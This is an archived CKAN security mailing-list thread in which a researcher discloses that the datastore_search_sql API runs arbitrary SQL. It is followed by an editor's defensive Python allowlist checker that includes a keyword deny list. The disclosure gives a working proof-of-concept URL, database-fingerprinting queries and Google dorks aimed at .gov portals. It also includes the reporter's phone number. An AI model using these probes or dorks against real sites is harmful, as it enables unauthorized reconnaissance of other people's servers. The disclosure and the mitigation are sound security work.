[CKAN-Security] Fwd: security vulnerability in CKAN

Adrià Mercader adria.mercader at okfn.org
Mon Mar 2 10:28:00 UTC 2015


Thanks Michael,

We'll discuss the issue and come back to you.

Adrià

On 2 March 2015 at 08:18, Matt Moore <matt.moore at okfn.org> wrote:
>
> ---------- Forwarded message ----------
> From: dophine britanico <dophine at gmail.com>
> Date: 2 March 2015 at 07:48
> Subject: Re: security vulnerability in CKAN
> To: Matt Moore <matt.moore at okfn.org>
>
>
> Hi,
>
> Thank you. I believe in responsible security disclosure, so I contacted you.
> Here is what I found while auditing our CKAN server.
>
> vulnerability: CKAN API
>
> URL: http://demo.ckan.org/api/action/datastore_search_sql
> SQL injection points: ?sql=INJECT HERE
>
> To replicate:
> Install JSON View plugin for firefox or chrome
>
> POC:
> http://demo.ckan.org/api/action/datastore_search_sql?sql=SELECT%20inet_server_addr%28%29;
>
> Sample: SQL
> SELECT current_database()
> SELECT current_user;
> SELECT inet_server_addr();
> SELECT version()
>
> The vulnerable URL will return sensitive information. A persistent attacker will
> use and escalate this to a total server compromise.
>
> Google dork:
> inurl:datastore_search_sql
>
> This can be also directly fingerprinted and replicated to any website using
> CKAN.
>
> Vulnerable as well is the US data portal www.data.gov, which I have also
> contacted in case your response is delayed.
>
> site:.gov datastore_search_sql
>
> Suggested Fix:
> Sanitize or remove the 'sql' input parameter from datastore_search_sql
> Remove the api_info.html?resource_id sample query from the default install
>
>
> Sincerely,
> Michael Britanico
>
>
> On Mon, Mar 2, 2015 at 3:27 PM, Matt Moore <matt.moore at okfn.org> wrote:
>>
>> Dophine,
>>
>> If you could provide us with some information, then we can look into the
>> vulnerability.  I've mentioned this to our development team, but without
>> some information, there's not much we can do.
>>
>> Thanks,
>>
>> Matthew Moore
>>
>> On 2 March 2015 at 06:13, dophine britanico <dophine at gmail.com> wrote:
>>>
>>> Hello,
>>>
>>> I would like to inform you of a remote and serious vulnerability in the
>>> default and recent version of CKAN and probably all recent versions of CKAN.
>>>
>>> Please contact me anytime.
>>>
>>> Dophine "Michael" Britanico
>>> Security Researcher
>>> (+63) 9151100672
>>>
>>
>> --
>> Matthew Moore
>> Sysadmin
>> Open Knowledge - www.okfn.org
>> Skype - notmatt
>
> --
> Matthew Moore
> Sysadmin
> Open Knowledge - www.okfn.org
> Skype - notmatt
>
> _______________________________________________
> CKAN security
> https://lists.okfn.org/mailman/listinfo/security
> https://lists.okfn.org/mailman/options/security/adria.mercader%40okfn.org
>
> Repo: https://github.com/ckan/ckan-security
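
Editor's note on the report above. The queries the reporter lists (current_user, version(), inet_server_addr(), current_database()) need no write privilege in PostgreSQL, so a read-only database role alone does not stop this class of leak; whether CKAN runs DataStore queries under such a role is not stated in this thread. If the 'sql' parameter is kept at all, something has to decide syntactically what a caller may submit. The following is an added example written for this archive page, not CKAN's code and not code supplied by the reporter: an allowlist check that refuses anything except a single SELECT over a fixed set of tables and functions. The table name demo_resource and the function list are hypothetical; a real deployment would derive the table set from the resource ids the caller is permitted to read.

```python
"""Allowlist check for a user-supplied SQL string before it reaches the database.

Editor's example, not CKAN code. The table and function allowlists are
hypothetical; a real deployment would derive ALLOWED_TABLES from the resource
ids the caller is permitted to read.
"""
import re

# Hypothetical resource table the caller may read (constructed for this example).
ALLOWED_TABLES = {"demo_resource"}

# Functions a caller may invoke. Anything else, including version(),
# inet_server_addr() and the pg_* families, is refused.
ALLOWED_FUNCTIONS = {"count", "sum", "avg", "min", "max", "lower", "upper", "length"}

# Words refused anywhere in the statement. current_user, session_user and user
# are included because PostgreSQL lets them be evaluated without parentheses.
FORBIDDEN_WORDS = {
    "into", "insert", "update", "delete", "drop", "alter", "create", "grant",
    "revoke", "truncate", "copy", "set", "pg_sleep", "current_user",
    "session_user", "user", "current_database",
}

# Keywords that may legitimately be followed by "(" without being a function call.
PAREN_OK_KEYWORDS = {"select", "from", "join", "where", "and", "or", "not", "in",
                     "exists", "on", "by", "when", "then", "else", "having"}

TOKEN_RE = re.compile(r"""
    (?P<ws>\s+)
  | (?P<comment>--|/\*)
  | (?P<string>'(?:[^']|'')*')
  | (?P<ident>"(?:[^"]|"")*")
  | (?P<number>\d+(?:\.\d+)?)
  | (?P<word>[A-Za-z_][A-Za-z0-9_]*)
  | (?P<punct>[(),;*=<>!.+\-/%:])
""", re.VERBOSE)


def tokenize(sql):
    """Split sql into (kind, text) tokens; refuse comments and unknown characters."""
    tokens, pos = [], 0
    while pos < len(sql):
        m = TOKEN_RE.match(sql, pos)
        if m is None:
            raise ValueError("unexpected character %r at offset %d" % (sql[pos], pos))
        kind, text, pos = m.lastgroup, m.group(), m.end()
        if kind == "comment":
            raise ValueError("comments are not allowed")
        if kind != "ws":
            tokens.append((kind, text))
    return tokens


def check_sql(sql, allowed_tables=ALLOWED_TABLES, allowed_functions=ALLOWED_FUNCTIONS):
    """Return (True, "") for a single SELECT over allowed tables and functions,
    otherwise (False, reason). Purely syntactic, so it is conservative."""
    try:
        tokens = tokenize(sql)
    except ValueError as exc:
        return False, str(exc)
    if tokens and tokens[-1] == ("punct", ";"):
        tokens.pop()                      # one trailing semicolon is harmless
    if not tokens:
        return False, "empty statement"
    if tokens[0][0] != "word" or tokens[0][1].lower() != "select":
        return False, "only SELECT statements are allowed"
    for i, (kind, text) in enumerate(tokens):
        if (kind, text) == ("punct", ";"):
            return False, "stacked statements are not allowed"
        if kind not in ("word", "ident"):
            continue
        # Unquoted names fold to lower case; quoted ones are taken literally.
        name = text.lower() if kind == "word" else text[1:-1].replace('""', '"')
        prev = tokens[i - 1] if i > 0 else None
        nxt = tokens[i + 1] if i + 1 < len(tokens) else None
        if kind == "word" and name in FORBIDDEN_WORDS:
            return False, "forbidden keyword: " + name
        if nxt == ("punct", "(") and not (kind == "word" and name in PAREN_OK_KEYWORDS):
            if name not in allowed_functions:
                return False, "function not in allowlist: " + name
        elif prev is not None and prev[0] == "word" and prev[1].lower() in ("from", "join"):
            if name not in allowed_tables:
                return False, "table not readable by this caller: " + name
    return True, ""


if __name__ == "__main__":
    for probe in ("SELECT inet_server_addr();", "SELECT current_user",
                  'SELECT count(*) FROM "demo_resource" WHERE "name" = \'x\''):
        print(probe, "->", check_sql(probe))
```

The check refuses comments, stacked statements, any statement that does not begin with SELECT, function calls outside the allowlist, bare keywords such as current_user, and any FROM/JOIN target outside the caller's table set; schema-qualified names like pg_catalog.pg_user fail the table test on their first component. Because it is a tokenizer rather than a parser it will also refuse some legitimate SQL (CTEs, for instance), which is the right direction of error for an endpoint that hands user text to the database.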
